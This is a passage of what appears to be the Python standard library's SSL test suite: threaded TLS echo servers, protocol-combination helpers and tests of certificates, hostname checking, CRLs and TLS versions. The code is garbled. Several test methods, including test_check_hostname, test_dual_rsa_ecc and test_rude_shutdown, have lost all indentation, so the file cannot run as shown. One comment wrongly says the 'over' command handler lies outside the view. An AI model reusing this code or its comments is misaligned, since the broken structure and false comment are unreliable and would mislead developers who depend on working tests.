            # Write to whichever layer is currently active (TLS or plain).
            if self.sslconn:
                return self.sslconn.write(bytes)
            else:
                return self.sock.send(bytes)

        def close(self):
            if self.sslconn:
                self.sslconn.close()
            else:
                self.sock.close()

        def run(self):
            # Main per-connection loop: dispatch on the stripped command
            # line, echoing anything unrecognized back in lowercase.
            self.running = True
            if not self.server.starttls_server:
                if not self.wrap_conn():
                    return
            while self.running:
                try:
                    msg = self.read()
                    stripped = msg.strip()
                    if not stripped:
                        # eof, so quit this handler
                        self.running = False
                        try:
                            self.sock = self.sslconn.unwrap()
                        except OSError:
                            # Many tests shut the TCP connection down
                            # without an SSL shutdown. This causes
                            # unwrap() to raise OSError with errno=0!
                            pass
                        else:
                            self.sslconn = None
                        self.close()
                    elif stripped == b'over':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: client closed connection\n")
                        self.close()
                        return
                    elif (self.server.starttls_server and
                          stripped == b'STARTTLS'):
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        if not self.wrap_conn():
                            return
                    elif (self.server.starttls_server and self.sslconn
                          and stripped == b'ENDTLS'):
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        self.sock = self.sslconn.unwrap()
                        self.sslconn = None
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: connection is now unencrypted...\n")
                    elif stripped == b'CB tls-unique':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
                        data = self.sslconn.get_channel_binding("tls-unique")
                        self.write(repr(data).encode("us-ascii") + b"\n")
                    elif stripped == b'PHA':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: initiating post handshake auth\n")
                        try:
                            self.sslconn.verify_client_post_handshake()
                        except ssl.SSLError as e:
                            self.write(repr(e).encode("us-ascii") + b"\n")
                        else:
                            self.write(b"OK\n")
                    elif stripped == b'HASCERT':
                        if self.sslconn.getpeercert() is not None:
                            self.write(b'TRUE\n')
                        else:
                            self.write(b'FALSE\n')
                    elif stripped == b'GETCERT':
                        cert = self.sslconn.getpeercert()
                        self.write(repr(cert).encode("us-ascii") + b"\n")
                    else:
                        if (support.verbose and
                            self.server.connectionchatty):
                            ctype = (self.sslconn and "encrypted") or "unencrypted"
                            sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
                                             % (msg, ctype, msg.lower(), ctype))
                        self.write(msg.lower())
                except (ConnectionResetError, ConnectionAbortedError):
                    # XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
                    # when connection is not shut down gracefully.
                    if self.server.chatty and support.verbose:
                        sys.stdout.write(
                            " Connection reset by peer: {}\n".format(
                                self.addr)
                        )
                    self.close()
                    self.running = False
                except ssl.SSLError as err:
                    # On Windows sometimes test_pha_required_nocert receives the
                    # PEER_DID_NOT_RETURN_A_CERTIFICATE exception
                    # before the 'tlsv13 alert certificate required' exception.
                    # If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
                    # is received test_pha_required_nocert fails with ConnectionResetError
                    # because the underlying socket is closed
                    if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
                        if self.server.chatty and support.verbose:
                            sys.stdout.write(err.args[1])
                        # test_pha_required_nocert is expecting this exception
                        raise ssl.SSLError('tlsv13 alert certificate required')
                except OSError:
                    if self.server.chatty:
                        handle_error("Test server failure:\n")
                    self.close()
                    self.running = False
                    # normally, we'd just stop here, but for the test
                    # harness, we want to stop the server
                    self.server.stop()

    def __init__(self, certificate=None, ssl_version=None,
                 certreqs=None, cacerts=None,
                 chatty=True, connectionchatty=False, starttls_server=False,
                 npn_protocols=None, alpn_protocols=None,
                 ciphers=None, context=None):
        # Either adopt the caller's context or build one from the
        # individual keyword arguments.
        if context:
            self.context = context
        else:
            self.context = ssl.SSLContext(ssl_version
                                          if ssl_version is not None
                                          else ssl.PROTOCOL_TLS_SERVER)
            self.context.verify_mode = (certreqs if certreqs is not None
                                        else ssl.CERT_NONE)
            if cacerts:
                self.context.load_verify_locations(cacerts)
            if certificate:
                self.context.load_cert_chain(certificate)
            if npn_protocols:
                self.context.set_npn_protocols(npn_protocols)
            if alpn_protocols:
                self.context.set_alpn_protocols(alpn_protocols)
            if ciphers:
                self.context.set_ciphers(ciphers)
        self.chatty = chatty
        self.connectionchatty = connectionchatty
        self.starttls_server = starttls_server
        self.sock = socket.socket()
        self.port = support.bind_port(self.sock)
        self.flag = None
        self.active = False
        # Per-connection results/errors collected for test assertions.
        self.selected_npn_protocols = []
        self.selected_alpn_protocols = []
        self.shared_ciphers = []
        self.conn_errors = []
        threading.Thread.__init__(self)
        self.daemon = True

    def __enter__(self):
        # Start the server thread and wait until it is accepting.
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        self.stop()
        self.join()

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        # Accept loop; the short timeout lets stop() take effect quickly.
        self.sock.settimeout(0.05)
        self.sock.listen()
        self.active = True
        if self.flag:
            # signal an event
            self.flag.set()
        while self.active:
            try:
                newconn, connaddr = self.sock.accept()
                if support.verbose and self.chatty:
                    sys.stdout.write(' server: new connection from '
                                     + repr(connaddr) + '\n')
                handler = self.ConnectionHandler(self, newconn, connaddr)
                handler.start()
                handler.join()
            except socket.timeout:
                pass
            except KeyboardInterrupt:
                self.stop()
            except BaseException as e:
                if support.verbose and self.chatty:
                    sys.stdout.write(
                        ' connection handling failed: ' + repr(e) + '\n')
        self.sock.close()

    def stop(self):
        # Causes the accept loop in run() to exit on its next timeout.
        self.active = False
class AsyncoreEchoServer(threading.Thread):
    """Threaded echo server built on the asyncore framework.

    Usable as a context manager; echoes received data back lower-cased.
    """
    # this one's based on asyncore.dispatcher
    class EchoServer (asyncore.dispatcher):
        class ConnectionHandler(asyncore.dispatcher_with_send):
            def __init__(self, conn, certfile):
                # Handshake is deferred (do_handshake_on_connect=False) so
                # it can be driven incrementally from the event loop.
                self.socket = test_wrap_socket(conn, server_side=True,
                                               certfile=certfile,
                                               do_handshake_on_connect=False)
                asyncore.dispatcher_with_send.__init__(self, self.socket)
                self._ssl_accepting = True
                self._do_ssl_handshake()
            def readable(self):
                if isinstance(self.socket, ssl.SSLSocket):
                    # Records may already be buffered inside OpenSSL where
                    # select() cannot see them; drain before polling again.
                    while self.socket.pending() > 0:
                        self.handle_read_event()
                return True
            def _do_ssl_handshake(self):
                # Advance the non-blocking handshake by one step.
                try:
                    self.socket.do_handshake()
                except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
                    # Not done yet; the event loop will call us again.
                    return
                except ssl.SSLEOFError:
                    return self.handle_close()
                except ssl.SSLError:
                    raise
                except OSError as err:
                    if err.args[0] == errno.ECONNABORTED:
                        return self.handle_close()
                else:
                    # Handshake completed; switch to echo mode.
                    self._ssl_accepting = False
            def handle_read(self):
                if self._ssl_accepting:
                    self._do_ssl_handshake()
                else:
                    data = self.recv(1024)
                    if support.verbose:
                        sys.stdout.write(" server: read %s from client\n" % repr(data))
                    if not data:
                        self.close()
                    else:
                        # Echo back, lower-cased.
                        self.send(data.lower())
            def handle_close(self):
                self.close()
                if support.verbose:
                    sys.stdout.write(" server: closed connection %s\n" % self.socket)
            def handle_error(self):
                raise
        def __init__(self, certfile):
            self.certfile = certfile
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.port = support.bind_port(sock, '')
            asyncore.dispatcher.__init__(self, sock)
            self.listen(5)
        def handle_accepted(self, sock_obj, addr):
            if support.verbose:
                sys.stdout.write(" server: new connection from %s:%s\n" %addr)
            self.ConnectionHandler(sock_obj, self.certfile)
        def handle_error(self):
            raise
    def __init__(self, certfile):
        self.flag = None
        self.active = False
        self.server = self.EchoServer(certfile)
        # Port is chosen by the dispatcher; expose it for clients.
        self.port = self.server.port
        threading.Thread.__init__(self)
        self.daemon = True
    def __str__(self):
        return "<%s %s>" % (self.__class__.__name__, self.server)
    def __enter__(self):
        self.start(threading.Event())
        self.flag.wait()
        return self
    def __exit__(self, *args):
        if support.verbose:
            sys.stdout.write(" cleanup: stopping server.\n")
        self.stop()
        if support.verbose:
            sys.stdout.write(" cleanup: joining server thread.\n")
        self.join()
        if support.verbose:
            sys.stdout.write(" cleanup: successfully joined.\n")
        # make sure that ConnectionHandler is removed from socket_map
        asyncore.close_all(ignore_all=True)
    def start (self, flag=None):
        self.flag = flag
        threading.Thread.start(self)
    def run(self):
        """Pump the asyncore event loop until stop() clears self.active."""
        self.active = True
        if self.flag:
            self.flag.set()
        while self.active:
            try:
                asyncore.loop(1)
            except:
                pass
    def stop(self):
        self.active = False
        self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
                       chatty=True, connectionchatty=False, sni_name=None,
                       session=None):
    """
    Launch a server, connect a client to it and try various reads
    and writes.

    Returns a dict of connection statistics (cipher, peercert, ALPN/NPN
    selections, TLS version, session-reuse info) gathered from both the
    client socket and the server thread.  Note *connectionchatty* controls
    client-side tracing only; the server is always created quiet.
    """
    stats = {}
    server = ThreadedEchoServer(context=server_context,
                                chatty=chatty,
                                connectionchatty=False)
    with server:
        with client_context.wrap_socket(socket.socket(),
                server_hostname=sni_name, session=session) as s:
            s.connect((HOST, server.port))
            # Exercise bytes, bytearray and memoryview payloads alike.
            for arg in [indata, bytearray(indata), memoryview(indata)]:
                if connectionchatty:
                    if support.verbose:
                        sys.stdout.write(
                            " client: sending %r...\n" % indata)
                s.write(arg)
                outdata = s.read()
                if connectionchatty:
                    if support.verbose:
                        sys.stdout.write(" client: read %r\n" % outdata)
                # The echo server lower-cases whatever it receives.
                if outdata != indata.lower():
                    raise AssertionError(
                        "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                        % (outdata[:20], len(outdata),
                           indata[:20].lower(), len(indata)))
            # presumably b"over" tells the server handler to end the
            # session -- handler is outside this view; TODO confirm.
            s.write(b"over\n")
            if connectionchatty:
                if support.verbose:
                    sys.stdout.write(" client: closing connection.\n")
            # Collect stats before close() invalidates the SSL object.
            stats.update({
                'compression': s.compression(),
                'cipher': s.cipher(),
                'peercert': s.getpeercert(),
                'client_alpn_protocol': s.selected_alpn_protocol(),
                'client_npn_protocol': s.selected_npn_protocol(),
                'version': s.version(),
                'session_reused': s.session_reused,
                'session': s.session,
            })
            s.close()
        stats['server_alpn_protocols'] = server.selected_alpn_protocols
        stats['server_npn_protocols'] = server.selected_npn_protocols
        stats['server_shared_ciphers'] = server.shared_ciphers
    return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
                       certsreqs=None, server_options=0, client_options=0):
    """
    Try to SSL-connect using *client_protocol* to *server_protocol*.
    If *expect_success* is true, assert that the connection succeeds,
    if it's false, assert that the connection fails.
    Also, if *expect_success* is a string, assert that it is the protocol
    version actually used by the connection.
    """
    if certsreqs is None:
        certsreqs = ssl.CERT_NONE
    certtype = {
        ssl.CERT_NONE: "CERT_NONE",
        ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
        ssl.CERT_REQUIRED: "CERT_REQUIRED",
    }[certsreqs]
    if support.verbose:
        # Braces in the trace mark combos that are expected to fail.
        formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
        sys.stdout.write(formatstr %
                         (ssl.get_protocol_name(client_protocol),
                          ssl.get_protocol_name(server_protocol),
                          certtype))
    client_context = ssl.SSLContext(client_protocol)
    client_context.options |= client_options
    server_context = ssl.SSLContext(server_protocol)
    server_context.options |= server_options
    min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
    if (min_version is not None
        # SSLContext.minimum_version is only available on recent OpenSSL
        # (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
        and hasattr(server_context, 'minimum_version')
        and server_protocol == ssl.PROTOCOL_TLS
        and server_context.minimum_version > min_version):
        # If OpenSSL configuration is strict and requires more recent TLS
        # version, we have to change the minimum to test old TLS versions.
        server_context.minimum_version = min_version

    # NOTE: we must enable "ALL" ciphers on the client, otherwise an
    # SSLv23 client will send an SSLv3 hello (rather than SSLv2)
    # starting from OpenSSL 1.0.0 (see issue #8322).
    if client_context.protocol == ssl.PROTOCOL_TLS:
        client_context.set_ciphers("ALL")

    for ctx in (client_context, server_context):
        ctx.verify_mode = certsreqs
        ctx.load_cert_chain(SIGNED_CERTFILE)
        ctx.load_verify_locations(SIGNING_CA)
    try:
        stats = server_params_test(client_context, server_context,
                                   chatty=False, connectionchatty=False)
    # Protocol mismatch can result in either an SSLError, or a
    # "Connection reset by peer" error.
    except ssl.SSLError:
        if expect_success:
            raise
    except OSError as e:
        if expect_success or e.errno != errno.ECONNRESET:
            raise
    else:
        if not expect_success:
            raise AssertionError(
                "Client protocol %s succeeded with server protocol %s!"
                % (ssl.get_protocol_name(client_protocol),
                   ssl.get_protocol_name(server_protocol)))
        elif (expect_success is not True
              and expect_success != stats['version']):
            raise AssertionError("version mismatch: expected %r, got %r"
                                 % (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
    def test_echo(self):
        """Basic test of an SSL client connecting to a server"""
        if support.verbose:
            sys.stdout.write("\n")
        # Echo over every generic protocol, client and server sharing one
        # context; the role-specific TLS_CLIENT/TLS_SERVER protocols are
        # exercised separately below.
        for protocol in PROTOCOLS:
            if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
                continue
            with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
                context = ssl.SSLContext(protocol)
                context.load_cert_chain(CERTFILE)
                server_params_test(context, context,
                                   chatty=True, connectionchatty=True)
        client_context, server_context, hostname = testing_context()
        with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
            server_params_test(client_context=client_context,
                               server_context=server_context,
                               chatty=True, connectionchatty=True,
                               sni_name=hostname)
        client_context.check_hostname = False
        # Any role mismatch below must fail with the OpenSSL
        # "called a function you should not call" error.
        with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
            with self.assertRaises(ssl.SSLError) as e:
                server_params_test(client_context=server_context,
                                   server_context=client_context,
                                   chatty=True, connectionchatty=True,
                                   sni_name=hostname)
            self.assertIn('called a function you should not call',
                          str(e.exception))
        with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
            with self.assertRaises(ssl.SSLError) as e:
                server_params_test(client_context=server_context,
                                   server_context=server_context,
                                   chatty=True, connectionchatty=True)
            self.assertIn('called a function you should not call',
                          str(e.exception))
        with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
            with self.assertRaises(ssl.SSLError) as e:
                server_params_test(client_context=server_context,
                                   server_context=client_context,
                                   chatty=True, connectionchatty=True)
            self.assertIn('called a function you should not call',
                          str(e.exception))
    def test_getpeercert(self):
        """getpeercert(): invalid before the handshake, populated after."""
        if support.verbose:
            sys.stdout.write("\n")
        client_context, server_context, hostname = testing_context()
        server = ThreadedEchoServer(context=server_context, chatty=False)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            do_handshake_on_connect=False,
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))
                # getpeercert() raise ValueError while the handshake isn't
                # done.
                with self.assertRaises(ValueError):
                    s.getpeercert()
                s.do_handshake()
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")
                cipher = s.cipher()
                if support.verbose:
                    sys.stdout.write(pprint.pformat(cert) + '\n')
                    sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
                if 'subject' not in cert:
                    self.fail("No subject field in certificate: %s." %
                              pprint.pformat(cert))
                if ((('organizationName', 'Python Software Foundation'),)
                    not in cert['subject']):
                    self.fail(
                        "Missing or invalid 'organizationName' field in certificate subject; "
                        "should be 'Python Software Foundation'.")
                self.assertIn('notBefore', cert)
                self.assertIn('notAfter', cert)
                # Validity interval must be well-formed.
                before = ssl.cert_time_to_seconds(cert['notBefore'])
                after = ssl.cert_time_to_seconds(cert['notAfter'])
                self.assertLess(before, after)
    @unittest.skipUnless(have_verify_flags(),
                         "verify_flags need OpenSSL > 0.9.8")
    def test_crl_check(self):
        """VERIFY_CRL_CHECK_LEAF fails without a CRL, passes once loaded."""
        if support.verbose:
            sys.stdout.write("\n")
        client_context, server_context, hostname = testing_context()
        tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
        self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
        # VERIFY_DEFAULT should pass
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")
        # VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
        client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                with self.assertRaisesRegex(ssl.SSLError,
                                            "certificate verify failed"):
                    s.connect((HOST, server.port))
        # now load a CRL file. The CRL file is signed by the CA.
        client_context.load_verify_locations(CRLFILE)
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
    def test_ecc_cert(self):
        """Handshake against a server using an ECC (ECDSA) certificate."""
        client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        client_context.load_verify_locations(SIGNING_CA)
        # Restrict the client to ECDHE/ECDSA suites so an RSA certificate
        # cannot be negotiated.
        client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
        hostname = SIGNED_CERTFILE_ECC_HOSTNAME
        server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        # load ECC cert
        server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
        # correct hostname should verify
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with client_context.wrap_socket(socket.socket(),
                                            server_hostname=hostname) as s:
                s.connect((HOST, server.port))
                cert = s.getpeercert()
                self.assertTrue(cert, "Can't get peer certificate.")
                cipher = s.cipher()[0].split('-')
                # NOTE(review): assertTrue(x, msg) takes the tuple as the
                # failure *message*, so this only checks cipher[:2] is
                # non-empty -- it never compares against ('ECDHE', 'ECDSA').
                # A strict assertEqual would break under TLS 1.3, whose
                # cipher names (e.g. 'TLS_AES_...') don't embed the key
                # exchange; a proper fix needs a version-aware check.
                self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
    def test_check_hostname_idn(self):
        """Hostname checking with internationalized (IDN) names."""
        if support.verbose:
            sys.stdout.write("\n")
        server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        server_context.load_cert_chain(IDNSANSFILE)
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        context.verify_mode = ssl.CERT_REQUIRED
        context.check_hostname = True
        context.load_verify_locations(SIGNING_CA)
        # correct hostname should verify, when specified in several
        # different ways
        # Each pair is (input hostname, expected normalized/ACE form).
        idn_hostnames = [
            ('könig.idn.pythontest.net',
             'xn--knig-5qa.idn.pythontest.net'),
            ('xn--knig-5qa.idn.pythontest.net',
             'xn--knig-5qa.idn.pythontest.net'),
            (b'xn--knig-5qa.idn.pythontest.net',
             'xn--knig-5qa.idn.pythontest.net'),
            ('königsgäßchen.idna2003.pythontest.net',
             'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
            ('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
             'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
            (b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
             'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),

            # ('königsgäßchen.idna2008.pythontest.net',
            #  'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
            ('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
             'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
            (b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
             'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
        ]
        for server_hostname, expected_hostname in idn_hostnames:
            server = ThreadedEchoServer(context=server_context, chatty=True)
            with server:
                with context.wrap_socket(socket.socket(),
                                         server_hostname=server_hostname) as s:
                    self.assertEqual(s.server_hostname, expected_hostname)
                    s.connect((HOST, server.port))
                    cert = s.getpeercert()
                    self.assertEqual(s.server_hostname, expected_hostname)
                    self.assertTrue(cert, "Can't get peer certificate.")
        # incorrect hostname should raise an exception
        server = ThreadedEchoServer(context=server_context, chatty=True)
        with server:
            with context.wrap_socket(socket.socket(),
                                     server_hostname="python.example.org") as s:
                with self.assertRaises(ssl.CertificateError):
                    s.connect((HOST, server.port))
    def test_wrong_cert_tls12(self):
        """Connecting when the server rejects the client's certificate

        Launch a server with CERT_REQUIRED, and check that trying to
        connect to it with a wrong client certificate fails.
        """
        client_context, server_context, hostname = testing_context()
        # load client cert that is not signed by trusted CA
        client_context.load_cert_chain(CERTFILE)
        # require TLS client authentication
        server_context.verify_mode = ssl.CERT_REQUIRED
        # TLS 1.3 has different handshake
        client_context.maximum_version = ssl.TLSVersion.TLSv1_2
        server = ThreadedEchoServer(
            context=server_context, chatty=True, connectionchatty=True,
        )
        with server, \
                client_context.wrap_socket(socket.socket(),
                                           server_hostname=hostname) as s:
            try:
                # Expect either an SSL error about the server rejecting
                # the connection, or a low-level connection reset (which
                # sometimes happens on Windows)
                s.connect((HOST, server.port))
            except ssl.SSLError as e:
                if support.verbose:
                    sys.stdout.write("\nSSLError is %r\n" % e)
            except OSError as e:
                # Only a connection reset is acceptable here.
                if e.errno != errno.ECONNRESET:
                    raise
                if support.verbose:
                    sys.stdout.write("\nsocket.error is %r\n" % e)
            else:
                self.fail("Use of invalid cert should have failed!")
    @unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
    def test_wrong_cert_tls13(self):
        """Like test_wrong_cert_tls12, but under TLS 1.3, where the client
        certificate is exchanged after the handshake so the failure only
        surfaces on the first read/write."""
        client_context, server_context, hostname = testing_context()
        # load client cert that is not signed by trusted CA
        client_context.load_cert_chain(CERTFILE)
        server_context.verify_mode = ssl.CERT_REQUIRED
        server_context.minimum_version = ssl.TLSVersion.TLSv1_3
        client_context.minimum_version = ssl.TLSVersion.TLSv1_3
        server = ThreadedEchoServer(
            context=server_context, chatty=True, connectionchatty=True,
        )
        with server, \
                client_context.wrap_socket(socket.socket(),
                                           server_hostname=hostname) as s:
            # TLS 1.3 perform client cert exchange after handshake
            s.connect((HOST, server.port))
            try:
                s.write(b'data')
                s.read(4)
            except ssl.SSLError as e:
                if support.verbose:
                    sys.stdout.write("\nSSLError is %r\n" % e)
            except OSError as e:
                # Only a connection reset is acceptable here.
                if e.errno != errno.ECONNRESET:
                    raise
                if support.verbose:
                    sys.stdout.write("\nsocket.error is %r\n" % e)
            else:
                self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
    @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
                         "OpenSSL is compiled without SSLv2 support")
    def test_protocol_sslv2(self):
        """Connecting to an SSLv2 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        # SSLv2<->SSLv2 must work at every certificate requirement level.
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
        # Newer protocol clients must be rejected by an SSLv2 server.
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
        # SSLv23 client with specific SSL options
        if no_sslv2_implies_sslv3_hello():
            # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
            try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
                               client_options=ssl.OP_NO_SSLv2)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
                           client_options=ssl.OP_NO_SSLv3)
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
                           client_options=ssl.OP_NO_TLSv1)
    def test_PROTOCOL_TLS(self):
        """Connecting to an SSLv23 server with various client options"""
        if support.verbose:
            sys.stdout.write("\n")
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            try:
                try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
            except OSError as x:
                # this fails on some older versions of OpenSSL (0.9.7l, for instance)
                if support.verbose:
                    sys.stdout.write(
                        " SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
                        % str(x))
        # SSLv3 is expected to be refused; TLSv1 clients negotiate TLSv1.
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
        # Same matrix again with client certificates optional/required.
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
            try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
        try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
        if hasattr(ssl, 'PROTOCOL_SSLv3'):
